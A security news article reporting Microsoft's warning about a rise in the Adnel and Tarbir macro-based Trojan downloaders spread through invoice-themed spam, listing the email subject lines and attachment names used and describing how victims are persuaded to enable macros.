Microsoft warns for new malware attacks with Office documents

Microsoft warns of increase in Adnel and Tarbir Trojan attacks on Excel and Word users

Microsoft has warned its Microsoft Office users of significant rise in malware attacks through macros in Excel and Word programs.  In a report published on its blog, Microsoft says that there is more than a threefold jump in the malware campaigns spreading two different Trojan downloaders. These Trojan downloaders arrive in emails masquerading as orders or invoices.

The malwares are being spread through spam emails containing following subject lines accordingly to Microsoft

  • ACH Transaction Report
  • DOC-file for report is ready
  • Invoice as requested
  • Invoice – P97291
  • Order – Y24383
  • Payment Details
  • Remittance Advice from Engineering Solutions Ltd
  • Your Automated Clearing House Transaction Has Been Put On

And the attachment containing Adnel and Tarbir campaigns is usually named as following :

  • 20140918_122519.doc
  • 813536MY.xls
  • ACH Transfer 0084.doc
  • Automated Clearing House transfer 4995.doc
  • BAC474047MZ.xls
  • BILLING DETAILS 4905.doc
  • CAR014 151239.doc
  • ID_2542Z.xls
  • Fuel bill.doc
  • ORDER DETAILS 9650.doc
  • Payment Advice 593016.doc
  • SHIPPING DETAILS 1181.doc
  • SHIP INVOICE 1677.doc
  • SHIPPING NO.doc

Microsoft Technet blog says that the two Trojan downloaders,  TrojanDownloader:W97M/Adnel and TrojanDownloader:O97M/Tarbir are being spread at a rapid pace through spam emails and phishing campaigns. Worryingly they are targeting both home PC users and enterprise customers and most of the victims are based in United States and United Kingdom.

Adnel and Tarbir telemetry

As Microsoft has decided to block execution of Macros in Office by default, the trojan authors/handlers add a notification to the document stating the contents of the documents can only be viewed with macros enabled. Upon opening the malware laden Word document or Excel sheet, the victim receives a default security warning stating macros have been disabled but some users simply disregard this message and enable the macros thus allowing the trojan downloaders to infect their PCs.

“The combination of the instructional document, spam email with supposed monetary content, and a seemingly relevant file name, can be enough to convince an unsuspecting user to click the Enable Content button”, according to Alden Pornasdoro of the Microsoft Malware Protection Center.

Once the Trojan downloader is downloaded it then starts to install other more deadlier malware on the systems it has infected.  Microsoft says that majority of invoices and orders sent by users dont require macros however if a user comes across such an order or invoice, he/she should be selective in running such documents or sheets.

LEAVE A REPLY

Please enter your comment!
Please enter your name here